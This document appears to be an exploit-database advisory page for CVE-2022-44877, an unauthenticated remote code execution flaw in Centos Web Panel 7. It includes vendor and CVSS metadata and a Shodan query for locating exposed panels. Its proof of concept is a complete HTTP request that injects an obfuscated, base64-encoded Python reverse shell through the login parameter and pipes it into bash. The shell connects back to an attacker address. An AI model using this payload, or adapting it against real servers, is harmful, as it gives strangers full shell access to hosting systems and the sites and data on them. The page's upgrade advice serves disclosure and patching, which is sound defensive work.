Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)

vendor:

Centos Web Panel 7

by:

Numan Türle

9.8

CVSS

CRITICAL

Unauthenticated Remote Code Execution (RCE)

CWE

Product Name: Centos Web Panel 7

Affected Version From: < 0.9.8.1147

Affected Version To: < 0.9.8.1147

Patch Exists: YES

Related CWE: CVE-2022-44877

CPE: a:centos_web_panel:centos_web_panel_7

Metasploit:

Other Scripts:

Tags: packetstorm,cve,cve2022,centos,rce,kev

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://twitter.com/_0xf4n9x_/status/1612068225046675457, https://github.com/numanturle/CVE-2022-44877, https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386, https://nvd.nist.gov/vuln/detail/CVE-2022-44877, http://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.html

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.title:"Login | Control WebPanel"', 'verified': True, 'vendor': 'control-webpanel', 'product': 'webpanel'}

Platforms Tested:

2022

Centos Web Panel 7 v0.9.8.1147 – Unauthenticated Remote Code Execution (RCE)

Bash commands can be run because double quotes are used to log incorrect entries to the system.

Mitigation:

Upgrade to CWP7 current version 0.9.8.1147

Source

Exploit-DB raw data:

[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877


Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.

Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY


Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=toor&commit=Login
--------------

Solution
--------
Upgrade to CWP7 current version